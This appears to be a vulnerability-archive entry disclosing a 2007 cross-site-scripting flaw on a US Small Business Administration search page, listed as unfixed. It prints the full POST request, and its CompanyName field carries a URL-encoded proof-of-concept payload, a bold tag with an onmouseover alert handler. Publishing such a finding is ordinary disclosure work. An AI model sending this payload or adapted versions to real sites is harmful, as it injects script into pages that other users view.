Security researcher system_meltdown, has submitted on 11/09/2007 a cross-site-scripting (XSS) vulnerability affecting dsbs.sba.gov, which at the time of submission ranked 18212 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 11/09/2007 |
Date published: 13/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
URL: http://dsbs.sba.gov/dsbs/search/dsp_profilelist.cfm |
POST: DispDisclaimer=block&CameFromQuickSearch=No&CameFromSearchHubzone=No&JavaScriptOn=Yes&MightNotGetSen t=Agr%2CAnemp%2CAnyAllGreen%2CAnyAllKeywords%2CAnyAllNaics%2CArea%2CAtLeastNoMore%2CCageCd%2CCbona%2 CCbonc%2CCdist%2CCnty%2CCntyNm%2CCompanyName%2CCompanyNameSearch%2CCompanyUserId%2CDav%2CDbe%2CDelim iter%2CDunses%2CE8a%2CE8acase%2CEdi%2CEdw%2CEin%2CExpCountry%2CExpMainAct%2CExpMrkt%2CExportCd%2CFir mListColumns%2CFirmListColumnNamesHidden%2CFontSize%2CGcc%2CGreens%2CGsa%2CHubCert%2CKeyWhere%2CKeyw ords%2CMinc%2CMincASN%2CMincBLK%2CMincHSP%2CMincIND%2CMincNAT%2CMntr%2CMsa%2CNaicses%2CNumberOfRows% 2CPassword%2CPhone%2CPIM%2CQas%2CSaveDBHits%2CSbaDsn%2CSbaOffice%2CSbaSbc%2CSbona%2CSbonc%2CSdb%2CSe archDB%2CSeckp%2CSecst%2CShowRandomizer%2CShowTable%2CSics%2CSort%2CState%2CStatus%2CTechnet%2CUpdat ed%2CUpdBefAft%2CUseOracle%2CUscit%2CUserId%2CVeteran%2CVietnam%2CWob%2CWomen%2CZip%2CDispAnyAllComm ent%2CDispAnyAllMSIE%2CDispDisclaimer%2CDispSectionLocation%2CDispSectionCertifications%2CDispSectio nOwnership%2CDispSectionNaicsAndKeywords%2CDispSectionAreaAndTechnet%2CDispSectionUpdated%2CDispSect ionBonding%2CDispSectionQas%2CDispSectionSize%2CDispSectionCapabilities%2CDispSectionSpecificFirm%2C DispSectionPrivSearch%2CDispSectionDisplayOptions&PageNames=dsp_dsbs.cfm%2Cdsp_profilelist.cfm%2Cdsp _profile.cfm&PIM=P&SearchDB=SBA&StartRow=1&StartTimeOfSearch=&DispSectionLocation=block&State=&Cdist =&Cnty=&CntyNm=&Phone=&Msa=&SbaOffice=&Zip=&DispSectionCertifications=block&E8a=N&Sdb=N&Dbe=&HubCert =N&DispSectionOwnership=block&DispSectionNaicsAndKeywords=block&AnyAllNaics=Any&Naicses=&AnyAllGreen =Any&Greens=&AnyAllKeywords=Any&Keywords=&KeyWhere=O&DispSectionAreaAndTechnet=block&DispSectionUpda ted=block&UpdBefAft=A&Updated=&DispSectionBonding=block&Cbonc=&Cbona=&Sbonc=&Sbona=&DispSectionQas=b lock&DispSectionSize=block&AtLeastNoMore=N&Anemp=&Agr=&DispSectionCapabilities=block&Gcc=N&Gsa=N&Exp ortCd=N&DispSectionSpecificFirm=block&CageCd=&Dunses=&E8acase=&Ein=&CompanyName=%3Cb+onmouseover%3Da lert%28%2Fxss%2F%29%3EMouse+Over+Me%21%3C%2Fb%3E&CompanyNameSearch=F&DispSectionPrivSearch=block&Sta tus=P&DispSectionDisplayOptions=block&NumberOfRows=25&FirmListColumns=I38%2CI37%2CI35%2CP01&FirmList ColumnNamesHidden=Name+and+Trade+Name+of+Firm%3BContact%3BAddress+and+City%2C+State+Zip%3BCapabiliti es+Narrative&FirmListColumnNamesDisplay=Name+and+Trade+Name+of+Firm%3B+Contact%3B+Address+and+City%2 C+State+Zip%3B+Capabilities+Narrative&ShowTable=Y&FontSize=2&Delimiter=C&Submit=Search+Using+These+C riteria |
Click here to view the mirror
|
|
|